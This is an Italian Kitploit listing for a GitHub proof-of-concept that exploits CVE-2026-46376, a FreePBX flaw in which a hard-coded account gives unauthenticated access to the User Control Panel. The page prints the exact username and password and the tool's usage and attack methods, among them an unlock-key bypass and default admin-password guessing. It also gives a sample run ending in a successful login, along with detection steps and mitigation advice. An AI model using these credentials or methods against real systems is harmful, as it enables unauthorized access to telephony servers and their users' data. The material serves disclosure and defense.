Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-46376 — CVE-2026-46376 - FreePBX Accesso UCP non autenticato tramite credenziali hard-coded | Kitploit
Strumenti/GitHubGitHub/portbuster1337/cve-2026-46376
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazionePaper e RicercaApprendimento e Formazione
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - FreePBX Accesso UCP non autenticato tramite credenziali hard-coded

Vedi Repository
133 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-46376 — Accesso UCP non autenticato su FreePBX tramite credenziali hard-coded

Una vulnerabilità critica nel modulo User Management (userman) di FreePBX consente a utenti non autenticati di accedere al Pannello di Controllo Utente (UCP) utilizzando credenziali hard-coded che vengono incorporate durante la procedura di impostazione del template generico UCP.

CVSS v4.0: 9.1 (Critico) | CWE-798: Uso di credenziali hard-coded

Divulgato: 15 maggio 2026 | Segnalatore: s0nnyWT

Dettagli

Quando un amministratore utilizza la funzionalità opzionale di impostazione del template generico UCP (introdotta nel 2021), viene creato un utente di sistema FreePBXUCPTemplateCreator con una password statica hard-coded. Se l'amministratore non modifica mai questa password dopo l'impostazione, qualsiasi utente non autenticato sulla rete può accedere all'UCP con queste credenziali.

CampoValore
UsernameFreePBXUCPTemplateCreator
Password1a2b3c@fd48jshs03123ld
SourceUserman.class.php — password passata tramite md5()
Attack VectorRete
ComplexityBassa
Auth RequiredNessuna
User InteractionNessuna
PrerequisiteL'amministratore deve aver eseguito l'impostazione del template generico UCP

Nota: L'utente FreePBXUCPTemplateCreator viene creato solo se un amministratore esegue esplicitamente la funzionalità di impostazione del template generico UCP. I sistemi in cui questa impostazione non è mai stata eseguita non sono sfruttabili tramite questa CVE, anche se eseguono una versione affetta.

Versioni Affette

PiattaformaModulo usermanAffetteCorretta
FreePBX 15—15.0.42+N/A
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7

La correzione randomizza la password utilizzando bin2hex(random_bytes(24)) durante l'installazione/aggiornamento, e i creatori di template esistenti ricevono la loro password rigenerata durante l'aggiornamento.

Utilizzo del PoC

root@kitploit:~
pip3 install requests
python3 poc.py <target_url>

Opzioni

root@kitploit:~
positional arguments:
  target              URL target (es. http://192.168.1.100)

optional arguments:
  -h, --help          mostra questo messaggio di aiuto ed esci
  --no-check          salta il controllo preliminare della versione
  --timeout TIMEOUT   timeout della richiesta in secondi (default: 15)
  --method {creds,unlock,admin,all}
                      quale metodo di exploit eseguire (default: all)
  -y, --yes           continua automaticamente anche se la versione è fuori range

Metodi

  1. creds — Accedi all'UCP tramite POST /ucp/ajax.php con module=User&command=login utilizzando le credenziali hard-coded
  2. unlock — Tenta il bypass della chiave di sblocco tramite i parametri di query ?unlockkey=&templateid=
  3. admin — Prova credenziali amministratore predefinite comuni sull'ACP

Esempio

root@kitploit:~
$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

Rilevamento

Per verificare se un sistema è sfruttabile, il PoC invia una richiesta di login a POST /ucp/ajax.php con module=User&command=login e le credenziali. Una risposta {"status":true} indica che l'utente creatore del template esiste e la password è ancora quella predefinita.

Una risposta {"status":false,"message":"Invalid Login Credentials"} significa che:

  • L'utente non esiste (l'impostazione del template non è mai stata eseguita), oppure
  • La password è già stata ruotata

Mitigazione

  • Aggiorna il modulo userman alla versione 16.0.45 (FreePBX 16) o 17.0.7 (FreePBX 17)
  • Verifica e ruota eventuali credenziali esistenti del template UCP — l'applicazione della patch NON modifica retroattivamente le password già distribuite
  • Limita l'accesso ACP/UCP a reti fidate utilizzando il modulo Firewall di FreePBX
  • Abilita MFA o SAML per livelli di autenticazione aggiuntivi
  • Controlla le sessioni UCP attive per login non autorizzati

Disclaimer

Questo PoC è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato di questo exploit contro sistemi di cui non si è proprietari o per cui non si ha esplicita autorizzazione al test è illegale. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.

Riferimenti

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • FreePBX userman commit (introduced)
Scarica lo strumento